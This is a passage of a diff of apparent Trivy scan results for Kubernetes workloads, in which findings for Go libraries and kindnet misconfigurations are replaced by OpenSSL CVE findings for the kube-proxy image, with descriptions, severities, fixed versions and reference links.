"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + }, + { + "type": "URL", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.4", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1n-0+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.4", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://ubuntu.com/security/notices/USN-5488-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5488-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5169", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/1960321", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", 